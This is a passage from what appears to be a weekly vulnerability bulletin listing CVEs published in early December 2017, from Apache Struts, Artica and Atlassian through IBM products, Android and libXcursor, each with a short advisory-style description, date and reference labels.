 		In Apache Struts 2.5 to 2.5.14, the REST Plugin is using an outdated JSON-lib library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted JSON payload.2017-12-01not yet calculatedCVE-2017-15707
BID
SECTRACK
CONFIRM
artica_tech -- web_proxy
 		Artica Web Proxy before 3.06.112911 allows remote attackers to execute arbitrary code as root by conducting a cross-site scripting (XSS) attack involving the username-form-id parameter to freeradius.users.php.2017-12-06not yet calculatedCVE-2017-17055
MISC
MISC
FULLDISC
EXPLOIT-DB
atlassian -- bitbucket
 		It is possible to bypass the bitbucket auto-unapprove plugin via minimal brute-force because it is relying on asynchronous events on the back-end. This allows an attacker to merge any code into unsuspecting repositories. This affects all versions of the auto-unapprove plugin, however since the auto-unapprove plugin is not bundled with Bitbucket Server it does not affect any particular version of Bitbucket.2017-12-05not yet calculatedCVE-2017-16857
CONFIRM
atlassian -- confluence
 		The RSS Feed macro in Atlassian Confluence before version 6.5.2 allows remote attackers to inject arbitrary HTML or JavaScript via cross site scripting (XSS) vulnerabilities in various rss properties which were used as links without restriction on their scheme.2017-12-05not yet calculatedCVE-2017-16856
BID
CONFIRM
audible -- amazon_audible_for_windows
 		ActiveSetupN.exe in Amazon Audible for Windows before November 2017 allows attackers to execute arbitrary DLL code if ActiveSetupN.exe is launched from a directory where an attacker has already created a Trojan horse dwmapi.dll file.2017-12-06not yet calculatedCVE-2017-17069
BID
MISC
MISC
auth0/auth0.js -- auth0/auth0.js
 		A cross-origin vulnerability has been discovered in the Auth0 auth0.js library affecting versions < 8.12. This vulnerability allows an attacker to acquire authenticated users' tokens and invoke services on a user's behalf if the target site or application uses a popup callback page with auth0.popup.callback().2017-12-06not yet calculatedCVE-2017-17068
CONFIRM
buffalo -- multiple_products
 		Cross-site scripting vulnerability in Buffalo BBR-4HG and and BBR-4MG broadband routers with firmware 1.00 to 1.48 and 2.00 to 2.07 allows an attacker to inject arbitrary web script or HTML via unspecified vectors.2017-12-08not yet calculatedCVE-2017-10896
CONFIRM
JVN
buffalo -- multiple_products
 		Input validation issue in Buffalo BBR-4HG and and BBR-4MG broadband routers with firmware 1.00 to 1.48 and 2.00 to 2.07 allows an attacker to cause the device to become unresponsive via unspecified vectors.2017-12-08not yet calculatedCVE-2017-10897
CONFIRM
JVN
cisco -- umbrella_virtual_appliance
 		The Cisco Umbrella Virtual Appliance Version 2.0.3 and prior contained an undocumented encrypted remote support tunnel (SSH) which auto initiated from the customer's appliance to Cisco's SSH Hubs in the Umbrella datacenters. These tunnels were primarily leveraged for remote support and allowed for authorized/authenticated personnel from the Cisco Umbrella team to access the appliance remotely and obtain full control without explicit customer approval. To address this vulnerability, the Umbrella Virtual Appliance version 2.1.0 now requires explicit customer approval before an SSH tunnel from the VA to the Cisco terminating server can be established.2017-12-01not yet calculatedCVE-2017-6679
BID
MISC
MISC
MISC
claymore -- dual_gpu_miner
 		The remote management interface on the Claymore Dual GPU miner 10.1 is vulnerable to an authenticated directory traversal vulnerability exploited by issuing a specially crafted request, allowing a remote attacker to read/write arbitrary files. This can be exploited via ../ sequences in the pathname to miner_file or miner_getfile.2017-12-05not yet calculatedCVE-2017-16929
MISC
MISC
claymore -- dual_gpu_miner
 		The remote management interface on the Claymore Dual GPU miner 10.1 allows an unauthenticated remote attacker to execute arbitrary code due to a stack-based buffer overflow in the request handler. This can be exploited via a long API request that is mishandled during logging.2017-12-05not yet calculatedCVE-2017-16930
MISC
MISC
debian -- debian
 		The pg_ctlcluster script in postgresql-common package in Debian wheezy before 134wheezy5, in Debian jessie before 165+deb8u2, in Debian unstable before 178, in Ubuntu 12.04 LTS before 129ubuntu1.2, in Ubuntu 14.04 LTS before 154ubuntu1.1, in Ubuntu 16.04 LTS before 173ubuntu0.1, in Ubuntu 17.04 before 179ubuntu0.1, and in Ubuntu 17.10 before 184ubuntu1.1 allows local users to gain root privileges via a symlink attack on a logfile in /var/log/postgresql.2017-12-05not yet calculatedCVE-2016-1255
UBUNTU
UBUNTU
CONFIRM
MLIST
debian -- debian
 		The apt package in Debian jessie before 1.0.9.8.4, in Debian unstable before 1.4~beta2, in Ubuntu 14.04 LTS before 1.0.1ubuntu2.17, in Ubuntu 16.04 LTS before 1.2.15ubuntu0.2, and in Ubuntu 16.10 before 1.3.2ubuntu0.1 allows man-in-the-middle attackers to bypass a repository-signing protection mechanism by leveraging improper error handling when validating InRelease file signatures.2017-12-05not yet calculatedCVE-2016-1252
MISC
UBUNTU
MISC
CONFIRM
DEBIAN
EXPLOIT-DB
debian -- debian
 		The most package in Debian wheezy before 5.0.0a-2.2, in Debian jessie before 5.0.0a-2.3+deb8u1, and in Debian unstable before 5.0.0a-3 allows remote attackers to execute arbitrary commands via shell metacharacters in the name of an LZMA-compressed file.2017-12-05not yet calculatedCVE-2016-1253
MLIST
BID
CONFIRM
MLIST
dell -- 2335dn_and_2355dn_multifunction_laser_printers
 		The web user interface of Dell 2335dn and 2355dn Multifunction Laser Printers, firmware versions prior to V2.70.06.26 A13 and V2.70.45.34 A10 respectively, are affected by a cross-site scripting vulnerability. Attackers could potentially exploit this vulnerability to execute arbitrary HTML or JavaScript code in the user's browser session in the context of the affected website.2017-12-07not yet calculatedCVE-2017-14386
CONFIRM
CONFIRM
dell -- storage_manager
 		The SMI-S service in Dell Storage Manager versions earlier than 16.3.20 (aka 2016 R3.20) is protected using a hard-coded password. A remote user with the knowledge of the password might potentially disable the SMI-S service via HTTP requests, affecting storage management and monitoring functionality via the SMI-S interface. This issue, aka DSM-30415, only affects a Windows installation of the Data Collector (not applicable to the virtual appliance).2017-12-05not yet calculatedCVE-2017-14374
CONFIRM
digium -- asterisk_open_source
 		An issue was discovered in chan_skinny.c in Asterisk Open Source 13.18.2 and older, 14.7.2 and older, and 15.1.2 and older, and Certified Asterisk 13.13-cert7 and older. If the chan_skinny (aka SCCP protocol) channel driver is flooded with certain requests, it can cause the asterisk process to use excessive amounts of virtual memory, eventually causing asterisk to stop processing requests of any kind.2017-12-01not yet calculatedCVE-2017-17090
CONFIRM
BID
CONFIRM
elastic -- packetbeat
 		Packetbeat versions prior to 5.6.4 are affected by a denial of service flaw in the PostgreSQL protocol handler. If Packetbeat is listening for PostgreSQL traffic and a user is able to send arbitrary network traffic to the monitored port, the attacker could prevent Packetbeat from properly logging other PostgreSQL traffic.2017-12-08not yet calculatedCVE-2017-11480
CONFIRM
elastic-- kibana
 		The Kibana fix for CVE-2017-8451 was found to be incomplete. With X-Pack installed, Kibana versions before 6.0.1 and 5.6.5 have an open redirect vulnerability on the login page that would enable an attacker to craft a link that redirects to an arbitrary website.2017-12-08not yet calculatedCVE-2017-11482
CONFIRM
elastic-- kibana
 		Kibana versions prior to 6.0.1 and 5.6.5 had a cross-site scripting (XSS) vulnerability via URL fields that could allow an attacker to obtain sensitive information from or perform destructive actions on behalf of other Kibana users.2017-12-08not yet calculatedCVE-2017-11481
CONFIRM
fiyo_cms -- fiyo_cms
 		Fiyo CMS 2.0.7 has an arbitrary file read vulnerability in dapur/apps/app_theme/libs/check_file.php via $_GET['src'] or $_GET['name'].2017-12-04not yet calculatedCVE-2017-17104
MISC
fiyo_cms -- fiyo_cms
 		Fiyo CMS 2.0.7 has SQL injection in /apps/app_user/sys_user.php via $_POST[name] or $_POST[email]. This vulnerability can lead to escalation from normal user privileges to administrator privileges.2017-12-04not yet calculatedCVE-2017-17103
MISC
fiyo_cms -- fiyo_cms
 		Fiyo CMS 2.0.7 has SQL injection in /system/site.php via $_REQUEST['link'].2017-12-04not yet calculatedCVE-2017-17102
MISC
flexsense_ltd -- syncbreeze_enterprise
 		There exists an unauthenticated SEH based Buffer Overflow vulnerability in the HTTP server of Flexense SyncBreeze Enterprise v10.1.16. When sending a GET request with an excessive length, it is possible for a malicious user to overwrite the SEH record and execute a payload that would run under the Windows SYSTEM account.2017-12-03not yet calculatedCVE-2017-17099
MISC
EXPLOIT-DB
fluentd -- fluentd
 		Escape sequence injection vulnerability in Fluentd versions 0.12.29 through 0.12.40 may allow an attacker to change the terminal UI or execute arbitrary commands on the device via unspecified vectors.2017-12-08not yet calculatedCVE-2017-10906
CONFIRM
CONFIRM
MISC
fossil -- fossil
 		http_transport.c in Fossil before 2.4, when the SSH sync protocol is used, allows user-assisted remote attackers to execute arbitrary commands via an ssh URL with an initial dash character in the hostname, a related issue to CVE-2017-9800, CVE-2017-12836, CVE-2017-12976, CVE-2017-14176, CVE-2017-16228, CVE-2017-1000116, and CVE-2017-1000117.2017-12-07not yet calculatedCVE-2017-17459
CONFIRM
CONFIRM
CONFIRM
game_music_emu -- game_music_emu
 		The Mem_File_Reader::read_avail function in Data_Reader.cpp in the Game_Music_Emu library (aka game-music-emu) 0.6.1 does not ensure a non-negative size, which allows remote attackers to cause a denial of service (application crash) via a crafted file.2017-12-06not yet calculatedCVE-2017-17446
MISC
MISC
genixcms -- genixcms
 		GeniXCMS 1.1.5 has XSS via the from, id, lang, menuid, mod, q, status, term, to, or token parameter. NOTE: this might overlap CVE-2017-14761, CVE-2017-14762, or CVE-2017-14765.2017-12-05not yet calculatedCVE-2017-17431
MISC
geovap -- reliance_scada
 		A Cross-site Scripting issue was discovered in Geovap Reliance SCADA Version 4.7.3 Update 2 and prior. This vulnerability could allow an unauthenticated attacker to inject arbitrary code.2017-12-04not yet calculatedCVE-2017-16721
BID
MISC
glibc -- glibc
 		The malloc function in the GNU C Library (aka glibc or libc6) 2.26 could return a memory block that is too small if an attempt is made to allocate an object whose size is close to SIZE_MAX, potentially leading to a subsequent heap overflow. This occurs because the per-thread cache (aka tcache) feature enables a code path that lacks an integer overflow check.2017-12-05not yet calculatedCVE-2017-17426
CONFIRM
CONFIRM
gnu -- binutils
 		The dump_relocs_in_section function in objdump.c in GNU Binutils 2.29.1 does not check for reloc count integer overflows, which allows remote attackers to cause a denial of service (excessive memory allocation, or heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted PE file.2017-12-04not yet calculatedCVE-2017-17122
MISC
MISC
gnu -- binutils
 		The Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.29.1, allows remote attackers to cause a denial of service (memory access violation) or possibly have unspecified other impact via a COFF binary in which a relocation refers to a location after the end of the to-be-relocated section.2017-12-04not yet calculatedCVE-2017-17121
MISC
MISC
gnu -- binutils
 		The coff_slurp_reloc_table function in coffcode.h in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.29.1, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted COFF based file.2017-12-04not yet calculatedCVE-2017-17123
MISC
MISC
gnu -- binutils
 		The _bfd_coff_read_string_table function in coffgen.c in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.29.1, does not properly validate the size of the external string table, which allows remote attackers to cause a denial of service (excessive memory consumption, or heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted COFF binary.2017-12-04not yet calculatedCVE-2017-17124
MISC
MISC
gnu -- binutils
 		The load_debug_section function in readelf.c in GNU Binutils 2.29.1 allows remote attackers to cause a denial of service (invalid memory access and application crash) or possibly have unspecified other impact via an ELF file that lacks section headers.2017-12-04not yet calculatedCVE-2017-17126
MISC
MISC
gnu -- binutils
 		nm.c and objdump.c in GNU Binutils 2.29.1 mishandle certain global symbols, which allows remote attackers to cause a denial of service (_bfd_elf_get_symbol_version_string buffer over-read and application crash) or possibly have unspecified other impact via a crafted ELF file.2017-12-04not yet calculatedCVE-2017-17125
MISC
MISC
gnu -- libextractor
 		GNU Libextractor 1.6 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted GIF, IT (Impulse Tracker), NSFE, S3M (Scream Tracker 3), SID, or XM (eXtended Module) file, as demonstrated by the EXTRACTOR_xm_extract_method function in plugins/xm_extractor.c.2017-12-06not yet calculatedCVE-2017-17440
BID
MISC
MISC
MISC
MISC
MISC
MISC
MISC
google -- androidA denial of service vulnerability in the Android media framework (libmpeg2). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-65717533.2017-12-06not yet calculatedCVE-2017-13148
CONFIRM
google -- androidAn information disclosure vulnerability in the Android system (activitymanagerservice). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-32879772.2017-12-06not yet calculatedCVE-2017-13159
BID
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the MediaTek performance service. Product: Android. Versions: Android kernel. Android ID A-64316572. References: M-ALPS03479086.2017-12-06not yet calculatedCVE-2017-13171
BID
CONFIRM
google -- android
 		An elevation of privilege vulnerability in the Android system (art). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-64211847.2017-12-06not yet calculatedCVE-2017-13156
BID
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the Android media framework (libaudioservice). Product: Android. Versions: 8.0. Android ID A-65280854.2017-12-06not yet calculatedCVE-2017-13153
CONFIRM
google -- android
 		An information disclosure vulnerability in the Android system (activitymanagerservice). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-32990341.2017-12-06not yet calculatedCVE-2017-13157
BID
CONFIRM
google -- android
 		An information disclosure vulnerability in the Android media framework (n/a). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-65719872.2017-12-06not yet calculatedCVE-2017-13149
CONFIRM
google -- android
 		An elevation of privilege vulnerability in the Android media framework (libstagefright). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-63666573.2017-12-06not yet calculatedCVE-2017-13154
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the kernel scsi driver. Product: Android. Versions: Android kernel. Android ID A-65023233.2017-12-06not yet calculatedCVE-2017-13168
CONFIRM
google -- android
 		An information disclosure vulnerability in the Android media framework (libmedia drm). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-62872384.2017-12-06not yet calculatedCVE-2017-13152
CONFIRM
google -- android

 		An information disclosure vulnerability in the kernel binder driver. Product: Android. Versions: Android kernel. Android ID A-36007193.2017-12-06not yet calculatedCVE-2017-13164
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the MediaTek display driver. Product: Android. Versions: Android kernel. Android ID A-36102397. References: M-ALPS03359280.2017-12-06not yet calculatedCVE-2017-13170
BID
CONFIRM
google -- android
 		An information disclosure vulnerability in the kernel camera server. Product: Android. Versions: Android kernel. Android ID A-37512375.2017-12-06not yet calculatedCVE-2017-13169
CONFIRM
google -- android
 		An elevation of privilege vulnerability in the kernel sound timer. Product: Android. Versions: Android kernel. Android ID A-37240993.2017-12-06not yet calculatedCVE-2017-13167
CONFIRM
google -- android
 		A remote code execution vulnerability in the Android media framework (libmpeg2). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-63874456.2017-12-06not yet calculatedCVE-2017-13151
CONFIRM
google -- android
 		An information disclosure vulnerability in the Android media framework (n/a). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-38328132.2017-12-06not yet calculatedCVE-2017-13150
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the MediaTek system server. Product: Android. Versions: Android kernel. Android ID A-28067350. References: M-ALPS02672361.2017-12-06not yet calculatedCVE-2017-13173
BID
CONFIRM
google -- android
 		NVIDIA mediaserver contains a vulnerability where it is possible a use after free malfunction can occur due to an incorrect bounds check which could enable unauthorized code execution and possibly lead to elevation of privileges. This issue is rated as high. Product: Android. Version: N/A. Android: A-63802421. References: N-CVE-2017-6276.2017-12-06not yet calculatedCVE-2017-6276
BID
CONFIRM
google -- android
 		An elevation of privilege vulnerability in the kernel binder. Product: Android. Versions: Android kernel. Android ID A-64216036.2017-12-06not yet calculatedCVE-2017-13162
BID
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the kernel edl. Product: Android. Versions: Android kernel. Android ID A-63100473.2017-12-06not yet calculatedCVE-2017-13174
BID
CONFIRM
google -- android
 		NVIDIA driver contains a vulnerability where it is possible a use after free malfunction can occur due to improper usage of the list_for_each kernel macro which could enable unauthorized code execution and possibly lead to elevation of privileges. This issue is rated as high. Product: Android. Version: N/A. Android ID: A-38046353. References: N-CVE-2017-6263.2017-12-06not yet calculatedCVE-2017-6263
BID
CONFIRM
google -- android
 		NVIDIA driver contains a vulnerability where it is possible a use after free malfunction can occur due to a race condition which could enable unauthorized code execution and possibly lead to elevation of privileges. This issue is rated as high. Product: Android. Version: N/A. Android ID: A-38045794. References: N-CVE-2017-6262.2017-12-06not yet calculatedCVE-2017-6262
BID
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the MediaTek bluetooth driver. Product: Android. Versions: Android kernel. Android ID A-36493287. References: M-ALPS03495791.2017-12-06not yet calculatedCVE-2017-13172
CONFIRM
google -- android
 		An elevation of privilege vulnerability in the Broadcom wireless driver. Product: Android. Versions: Android kernel. Android ID A-63930471. References: BC-V2017092501.2017-12-06not yet calculatedCVE-2017-13161
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the kernel mtp usb driver. Product: Android. Versions: Android kernel. Android ID A-37429972.2017-12-06not yet calculatedCVE-2017-13163
CONFIRM
google -- android
 		A remote code execution vulnerability in the Android system (bluetooth). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-37160362.2017-12-06not yet calculatedCVE-2017-13160
BID
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the kernel file system. Product: Android. Versions: Android kernel. Android ID A-31269937.2017-12-06not yet calculatedCVE-2017-13165
CONFIRM
google -- android

 		An elevation of privilege vulnerability in the kernel v4l2 video driver. Product: Android. Versions: Android kernel. Android ID A-34624167.2017-12-06not yet calculatedCVE-2017-13166
CONFIRM
google -- android
 		An information disclosure vulnerability in the Android system (activitymanagerservice). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-32879915.2017-12-06not yet calculatedCVE-2017-13158
BID
CONFIRM
google -- android

 		An information disclosure vulnerability in the NVIDIA libwilhelm. Product: Android. Versions: Android kernel. Android ID A-64339309. References: N-CVE-2017-13175.2017-12-06not yet calculatedCVE-2017-13175
CONFIRM
google-- android
 		A denial of service vulnerability in the Android media framework (libmpeg2). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-63316255.2017-12-06not yet calculatedCVE-2017-0873
CONFIRM
google-- android
 		A denial of service vulnerability in the Android media framework (libskia). Product: Android. Versions: 7.0, 7.1.1, 7.1.2. Android ID A-65646012.2017-12-06not yet calculatedCVE-2017-0880
CONFIRM
google-- android
 		An information disclosure vulnerability in the Android media framework (n/a). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-65025028.2017-12-06not yet calculatedCVE-2017-0879
CONFIRM
google-- android
 		A remote code execution vulnerability in the Android media framework (libavc). Product: Android. Versions: 6.0. Android ID A-64964675.2017-12-06not yet calculatedCVE-2017-0876
CONFIRM
google-- android
 		An elevation of privilege vulnerability in the Android media framework (libaudiopolicymanager). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-64340921.2017-12-06not yet calculatedCVE-2017-0837
CONFIRM
google-- android
 		An elevation of privilege vulnerability in the Android framework (libminikin). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-62134807.2017-12-06not yet calculatedCVE-2017-0870
CONFIRM
google-- android
 		A denial of service vulnerability in the Android media framework (libavc). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-63315932.2017-12-06not yet calculatedCVE-2017-0874
CONFIRM
google-- android
 		A remote code execution vulnerability in the Android media framework (libhevc). Product: Android. Versions: 8.0. Android ID A-65186291.2017-12-06not yet calculatedCVE-2017-0878
CONFIRM
google-- android
 		A remote code execution vulnerability in the Android media framework (libavc). Product: Android. Versions: 6.0. Android ID A-66372937.2017-12-06not yet calculatedCVE-2017-0877
CONFIRM
google-- android
 		An elevation of privilege vulnerability in the Android framework (framework base). Product: Android. Versions: 8.0. Android ID A-65281159.2017-12-06not yet calculatedCVE-2017-0871
CONFIRM
google-- android
 		A remote code execution vulnerability in the Android media framework (libskia). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-65290323.2017-12-06not yet calculatedCVE-2017-0872
CONFIRM
heimdal -- heimdal_security
 		In Heimdal through 7.4, remote unauthenticated attackers are able to crash the KDC by sending a crafted UDP packet containing empty data fields for client name or realm. The parser would unconditionally dereference NULL pointers in that case, leading to a segmentation fault. This is related to the _kdc_as_rep function in kdc/kerberos5.c and the der_length_visible_string function in lib/asn1/der_length.c.2017-12-06not yet calculatedCVE-2017-17439
MISC
CONFIRM
CONFIRM
CONFIRM
DEBIAN
hpe -- connected_backup
 		A potential security vulnerability has been identified in HPE Connected Backup versions 8.6 and 8.8.6. The vulnerability could be exploited locally to allow escalation of privilege.2017-12-05not yet calculatedCVE-2017-14355
BUGTRAQ
BID
CONFIRM
i2pd -- i2pd
 		The (1) i2pd before 2.17 and (2) kovri pre-alpha implementations of the I2P routing protocol do not properly handle Garlic DeliveryTypeTunnel packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading sensitive router memory, aka the GarlicRust bug.2017-12-05not yet calculatedCVE-2017-17066
MISC
MISC
ibm -- atlas_ediscovery_process_management

 		IBM Atlas eDiscovery Process Management 6.0.3 stores sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. IBM X-Force ID: 126682.2017-12-07not yet calculatedCVE-2017-1355
BID
MISC
CONFIRM
ibm -- atlas_ediscovery_process_management
 		IBM Atlas eDiscovery Process Management 6.0.3 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 126683.2017-12-07not yet calculatedCVE-2017-1356
BID
MISC
CONFIRM
ibm -- atlas_ediscovery_process_management
 		IBM Atlas eDiscovery Process Management 6.0.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 126681.2017-12-07not yet calculatedCVE-2017-1354
MISC
CONFIRM
ibm -- atlas_ediscovery_process_management
 		IBM Atlas eDiscovery Process Management 6.0.3 could allow an authenticated attacker to obtain sensitive information when an unsuspecting user clicks on unsafe third-party links. IBM X-Force ID: 126680.2017-12-07not yet calculatedCVE-2017-1353
MISC
CONFIRM
ibm -- connections
 		IBM Connections 5.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 129020.2017-12-07not yet calculatedCVE-2017-1498
CONFIRM
BID
MISC
ibm -- sterling_b2b_intergrator_standard_edition
 		IBM Sterling B2B Integrator Standard Edition 5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 128620.2017-12-07not yet calculatedCVE-2017-1482
CONFIRM
BID
MISC
ibm -- sterling_b2b_intergrator_standard_edition
 		IBM Sterling B2B Integrator Standard Edition 5.2 allows a user to view sensitive information that belongs to another user. IBM X-Force ID: 128619.2017-12-07not yet calculatedCVE-2017-1481
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 		IBM Sterling File Gateway 2.2 could allow an authenticated attacker to obtain sensitive information such as login ids on the system. IBM X-Force ID: 128626.2017-12-07not yet calculatedCVE-2017-1487
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 		IBM Sterling File Gateway 2.2 could allow an unauthorized user to view files they should not have access to providing they know the directory location of the file. IBM X-Force ID: 128695.2017-12-07not yet calculatedCVE-2017-1497
CONFIRM
MISC
ibm -- tririga
 		IBM TRIRIGA 3.2, 3.3, 3.4, and 3.5 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 128464.2017-12-07not yet calculatedCVE-2017-1465
CONFIRM
MISC
ibm -- websphere_mq
 		IBM WebSphere MQ 8.0 and 9.0 could allow, under special circumstances, an unauthorized user to access an object which they should have been denied access. IBM X-Force ID: 126456.2017-12-07not yet calculatedCVE-2017-1341
CONFIRM
BID
MISC
ibm -- websphere_mq
 		IBM WebSphere MQ 7.5, 8.0, and 9.0 could allow an authenticated user to insert messages with a corrupt RFH header into the channel which would cause it to restart. IBM X-Force ID: 127803.2017-12-07not yet calculatedCVE-2017-1433
CONFIRM
MISC
ibm -- infosphere_biginsights
 		IBM Infosphere BigInsights 4.2.0 could allow an attacker to inject code that could allow access to restricted data and files. IBM X-Force ID: 126244.2017-12-07not yet calculatedCVE-2017-1336
CONFIRM
BID
MISC
ibm -- insights_foundation_for_energy
 		IBM Insights Foundation for Energy 2.0 could reveal sensitive information in error messages to authenticated users that could e used to conduct further attacks. IBM X-Force ID: 126457.2017-12-07not yet calculatedCVE-2017-1342
CONFIRM
MISC
ibm -- security_guardium
 		IBM Security Guardium 9.0, 9.1, and 9.5 supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties. IBM X-Force ID: 124746.2017-12-07not yet calculatedCVE-2017-1271
CONFIRM
BID
SECTRACK
MISC
icodechecker -- icodechecker
 		A Regular expression Denial of Service (ReDoS) vulnerability in the file marked.js of the marked npm package (tested on version 0.3.7) allows a remote attacker to overload and crash a server by passing a maliciously crafted string.2017-12-07not yet calculatedCVE-2017-17461
MISC
ispconfig -- ispconfig
 		ISPConfig 3.x before 3.1.9 allows remote authenticated users to obtain root access by creating a crafted cron job.2017-12-07not yet calculatedCVE-2017-17384
CONFIRM
japan_agency_for_local_authority_information_systems -- jpki
 		Untrusted search path vulnerability in The Public Certification Service for Individuals "The JPKI user's software" Ver3.1 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.2017-12-08not yet calculatedCVE-2017-10893
JVN
jenkins -- jenkins
 		Jenkins through 2.93 allows remote authenticated administrators to conduct XSS attacks via a crafted tool name in a job configuration form, as demonstrated by the JDK tool in Jenkins core and the Ant tool in the Ant plugin, aka SECURITY-624.2017-12-06not yet calculatedCVE-2017-17383
CONFIRM
johnson_and_johnson -- ethicon_endo-surgery_generator_gen11
 		An improper authentication issue was discovered in Johnson & Johnson Ethicon Endo-Surgery Generator Gen11, all versions released before November 29, 2017. The security authentication mechanism used between the Ethicon Endo-Surgery Generator Gen11 and single-patient use products can be bypassed, allowing for unauthorized devices to be connected to the generator, which could result in a loss of integrity or availability.2017-12-05not yet calculatedCVE-2017-14018
BID
MISC
k7_computing -- k7_antivirusK7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x95002570 DeviceIoControl request.2017-12-08not yet calculatedCVE-2017-17464
MISC
k7_computing -- k7_antivirus
 		K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x95002574 DeviceIoControl request.2017-12-08not yet calculatedCVE-2017-17465
MISC
kaspersky -- embedded_systems_security
 		Kernel pool memory corruption in one of drivers in Kaspersky Embedded Systems Security version 1.2.0.300 leads to local privilege escalation.2017-12-08not yet calculatedCVE-2017-12823
CONFIRM
libav -- libav
 		The h264_slice_init function in libavcodec/h264_slice.c in Libav 12.2 allows remote attackers to cause a denial of service (segmentation fault and application crash) via a crafted file.2017-12-04not yet calculatedCVE-2017-17128
MISC
libav -- libav
 		The ff_vc1_mc_4mv_chroma4 function in libavcodec/vc1_mc.c in Libav 12.2 allows remote attackers to cause a denial of service (segmentation fault and application crash) or possibly have unspecified other impact via a crafted file.2017-12-04not yet calculatedCVE-2017-17129
MISC
libav -- libav
 		The vc1_decode_frame function in libavcodec/vc1dec.c in Libav 12.2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted file.2017-12-04not yet calculatedCVE-2017-17127
MISC
libav -- libav
 		The ff_free_picture_tables function in libavcodec/mpegpicture.c in Libav 12.2 allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file, related to vc1_decode_i_blocks_adv.2017-12-04not yet calculatedCVE-2017-17130
MISC
libsndfile -- libsndfile
 		The function d2alaw_array() in alaw.c of libsndfile 1.0.29pre1 may lead to a remote DoS attack (SEGV on unknown address 0x000000000000), a different vulnerability than CVE-2017-14245.2017-12-07not yet calculatedCVE-2017-17456
MISC
libsndfile -- libsndfile
 		The function d2ulaw_array() in ulaw.c of libsndfile 1.0.29pre1 may lead to a remote DoS attack (SEGV on unknown address 0x000000000000), a different vulnerability than CVE-2017-14246.2017-12-07not yet calculatedCVE-2017-17457
MISC
libtiff -- libtifftools/pal2rgb.c in pal2rgb in LibTIFF 4.0.9 allows remote attackers to cause a denial of service (TIFFSetupStrips heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted TIFF file.2017-12-02not yet calculatedCVE-2017-17095
MISC
MISC
libxcursor -- libxcursor
 		libXcursor before 1.1.15 has various integer overflows that could lead to heap buffer overflows when processing malicious cursors, e.g., with programs like GIMP.2017-12-01not yet calculatedCVE-2017-16612
CONFIRM
MLIST
UBUNTU
CONFIRM
CONFIRM
MLIST
DEBIAN
